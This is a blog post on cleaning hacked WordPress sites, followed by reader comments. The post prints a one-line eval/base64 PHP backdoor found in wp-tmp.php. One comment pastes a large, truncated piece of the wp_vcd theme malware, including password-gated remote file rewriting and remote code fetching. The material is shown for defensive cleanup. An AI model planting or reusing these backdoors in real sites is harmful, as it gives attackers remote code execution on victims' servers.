In January, one of my website was hacked. The symptom was when I access the website, it only show a white screen in the browser. I didn’t pay much attention on that, just restore the whole website from a early backup. However, it was just the beginning of the nightmare. After one month, all my websites were hacked on the same share hosting. Now it becomes a serious problem. And two of my websites are already marked as “Malware code injection”. Then my cleaning hacked WordPress website journey is beginning.

How to Clean Hacked WordPress Website

All hacked websites are powered by WordPress. I think it will be very helpful if I share my experience about how to find out the hack files in WordPress website. Actually, there are several steps to find hack code and clean hacked WordPress Website.

Find Suspicious Files in WordPress Website

To clean a hacked WordPress website, the step 1 is finding all suspicious files in hacked WordPress website. If you are familiar with WordPress, it will be very easy to find suspicious files in WordPress website. If you are not familiar with WordPress, you can download the latest version of WordPress and then compare files with your hacked WordPress website. In my website, I find there is a file named “wp-tmp.php” in the root folder. This is the most common way in which hacker hide their backdoor script.

Suspicious file wp-tmp.php in Hacked WordPress Website

The “wp-tmp.php” looks very similar with other WordPress files, such as “wp-login.php”, “wp-settings.php”. However, “wp-tmp.php” is definitely a backdoor where hackers will use this file to access your WordPress website and inject malware in your website. The “wp-tmp.php” looks like this:

<?php
$p = $_REQUEST&#91;"m"&#93;; eval(base64_decode($p));
?>

Backdoor in WordPress Uploads Folder

Step 2 to clean hacked WordPress website is searching harmful code in uploads folder. The “wp-content/uploads” folder in WordPress is another place where hackers like to put their malware code. Because the uploads folder contains all media files we upload to our website, we will not delete this folder when we clean the hacked website. So when you are cleaning a hacked WordPress site, you must search this folder to check if there are some php files inside.

Clean a Hacked WordPress Site in 5 Minutes

Step 3 to clean hacked WordPress site is deleting all hacked files. After I find all suspicious files in hacked WordPress Website, simply deleting these files is not enough. Many hackers like to change WordPress system file to inject some harmful code inside. This type of hacked files is very hard to find and clean. So the best way to clean your hacked WordPress website is deleting all WordPress system files, and backup the “wp-content” folder and “wp-config.php” file in root folder.

Restore Clean WordPress System Files

Step 4 is restoring WordPress system files. This step is quite simple. I download the latest WordPress source code from wordpress.org and copy all WordPress files to my website. Please remember to upload your own “wp-content” folder and “wp-config.php” file which you backup in step 3.

Stop WordPress Cron Job

Step 5 is stoping cron job in WordPress. Though this step may not be necessary, it is better to keep your website safe. As my clean hacked WordPress experience, some sophisticated hackers will hide their injection code in database and use WordPress cron job to run this harmful code, then hacked your WordPress website again.

To stop cron job in WordPress, you can edit the “wp-config.php” file:

define('DISABLE_WP_CRON', 'true');

Another way to stop cron job is rename the “wp-cron.php” file or delete it. In my website, I take both of above actions.

Ask Google to Review Your Website

If your hacked website is already marked as malware website by google, you have to ask google to review your website. First, you can register to Google webmaster. For more information, you can check this Google official document:

About malware, hacking, and infected sites

Prevent Your Website Being Hacked

After you clean the hacked WordPress site successfully, you should keep watching on the website at least for 2 or 3 days. Hackers will try their best to hack your website again when they find they lose the control of your website. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, at least you will find where hackers walk in your website. Then you just repeat the above steps and close the backdoor. Therefore, you should keep watching the access log until there is no suspicious access. Here is my raw access log example. The website was hacked again after I clean my hacked WordPress website. So I delete all WordPress system files and stop my cron job in WordPress.

QQ20160306-0@2x

Avoid Brute Force Login

Brute force attack is the most common way to hack website to get username and password. Lots of people use some brute force attack web service to attack WordPress powered website to get the admin username and password. Here is how it looks like in access log:
brute force attack

To keep our website safe, we must take some actions to protect our website. Here is an article to talk about how to avoid login page brute force attack.

Delete Unknown Account

What’s the simplest back door in a hacked website? The answer is an administrator account. That’s right. Please really don’t forget to check if there are unusual account in your website. It is very simple to check it. Just go to your website backend and check the account list. Delete all unnecessary accounts you don’t need.

Change Your Administrator Password

When your website is compromised, your username and password may already leak out. In my hacked WordPress website, the file “wp-includes/user.php” is injected with hacked code. I guess this injected hack code will get all plain user name and password when we try to login with our username and password. Therefore, the last step to clean up your website is changing your administrator password.

Previous PostNext Post

17 Comments

  1. seems like one of my client’s have the same problem, with the same attacker (at least the IP came from the same network, HostSailor NL)

    1. Oh, really. In my website, the hacker left lots of php files in wp-include folder and wp-admin folder. All these hack file name looks like “edit_.php”, “user_.php”.

    1. I guess the back door maybe in the cron job in database, as my website was hacked again even I replace all wp files with new fresh one.

      I watch the log file. At the beginning, the hacker try to access the wp-tmp.php and he get 404 error. Once my website do wordpress cron job, and after that, the hacker’s wp-tmp.php is back.

      So I guess the hack inject the hack code in the cron job in wordpress, so I disable wordpress cron job, and delete the cron script completely.

      Currently, my website is running, but I can still see hacker try to break it. Quite scare.

  2. i have tablet dragon touch E70 i can not open t beucase there is message that adulate browser has stop so prevent to contnue open the tablet i had tried many tmes reset the device to he factory and tried to formate but the same the device locked please help

  3. Hllo i have similar problems. Even if i delete the 2 files wp-tmp.php wp-feed.php after one minute they appear again. I don t want to do

    1. The hacker already put some backdoor script in your website, which may hidden in normal wordpress script or theme script.

    2. I have the same problem, the file regenerate automatically.
      I tried to clean the files reinstalling the wp-includes and wp-admin folders.
      I also deleted the wp-cron.php file

      Can’t find a solution right now. Did you?

      1. It’s highly possible the hacking code is hiding in plugin file or theme file. That’s why all problem files are regenerated automatically. Last time, I found the walware code in my theme file.

  4. Since i can’t recognize and find the malware i will have to delete everything and make a new install of wordpress, them and every single plugin from a fresh install.

    I found a temporary solution to avoid the script to recreate themselves. I created 2 new files named “wp-tmp,php” and “wp-feed.php” with no code inside. Then i deleted the 2 respective files in the my folder server, and i quickly uploaded my 2 files in the same folder so that they can’t be recreated by the malware since they already exist.

  5. I found the solution, look for the functions.php in your theme folder. Open it and delete the first part of code that is hacked.
    (also google the word “go.pub2srv.com” to find more solutions)
    This is the code:

    <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35160fd9ce44b4c2a1c074cd994bf65a'))

    {

    $div_code_name="wp_vcd";

    switch ($_REQUEST['action'])

    {

    case 'change_domain';

    if (isset($_REQUEST['newdomain']))

    {

    if (!empty($_REQUEST['newdomain']))

    {

    if ($file = @file_get_contents(__FILE__))

    {

    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))

    {

    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

    @file_put_contents(__FILE__, $file);

    print "true";

    }

    }

    }

    }

    break;

    case 'change_code';

    if (isset($_REQUEST['newcode']))

    {

    if (!empty($_REQUEST['newcode']))

    {

    if ($file = @file_get_contents(__FILE__))

    {

    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))

    {

    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);

    @file_put_contents(__FILE__, $file);

    print "true";

    }

    }

    }

    }

    break;

    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";

    }

    die("");

    }

    $div_code_name = "wp_vcd";

    $funcfile = __FILE__;

    if(!function_exists('theme_temp_setup')) {

    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];

    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

    function file_get_contents_tcurl($url)

    {

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($ch, CURLOPT_URL, $url);

    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

    $data = curl_exec($ch);

    curl_close($ch);

    return $data;

    }

    function theme_temp_setup($phpCode)

    {

    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");

    $handle = fopen($tmpfname, "w+");

    fwrite($handle, "<?php

  6. Also look in the database for “wp-tmp” and you’ll find some other string in the options table to remove

  7. This occurs by using NULLED themes and plugins

    You have to know that everything nulled is contaminated by malicious code.

    When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.

    wp-vcd.php
    wp-tmp.php:

    AND ALSO modifies
    post.php
    functions.php

Leave a Reply to James Liu Cancel reply

Your email address will not be published. Required fields are marked *